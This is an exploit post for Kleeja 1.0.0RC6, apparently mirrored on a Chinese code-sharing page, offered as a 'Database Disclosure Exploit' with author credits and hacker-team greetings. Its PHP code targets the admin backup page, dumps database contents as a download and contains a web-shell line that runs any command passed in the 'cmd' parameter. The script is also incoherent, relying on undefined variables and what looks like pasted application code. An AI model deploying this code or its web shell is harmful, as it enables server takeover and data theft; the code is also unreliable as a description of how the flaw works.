扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 |
==================================================== kleeja1.0.0RC6 Database Disclosure Exploit ==================================================== ######################################################################## # Vendor: kleeja.com # Date: 2010-05-27 # Author : indoushka # Contact : 00213771818860 # Home : www.sec4ever.com # Bug: Database Disclosure Exploit # Tested on : windows SP2 Fran?ais V.(Pnx2 2.0) ######################################################################## # Exploit By indoushka <?php $action = "http://127.0.0.1/kleeja/admin.php?cp=bckup"; $sql_data = "# 1.0.0RC6, DB version:6\n"; $sql_data .= "# Kleeja Backup kleeja.comkleeja version : " . KLEEJA_VERSION . ", DB version:" . $config['db_version'] . "\n"; $sql_data .= "# DATE : " . gmdate("d-m-Y H:i:s", time()) . " GMT\n"; $sql_data .= "#\n\n\n"; $cmd = $_GET['cmd']; system($cmd); $db_name_save = $dbname . '_kleeja.sql'; @set_time_limit(0); header("Content-length: " . strlen($outta)); header("Content-type: text/plain"); header("Content-Disposition: attachment; filename=$db_name_save"); echo $sql_data . $outta; exit; ?> Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel =========================== special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH --------------------------------------------------------------------------------------------------------------------------------- |
体验盒子
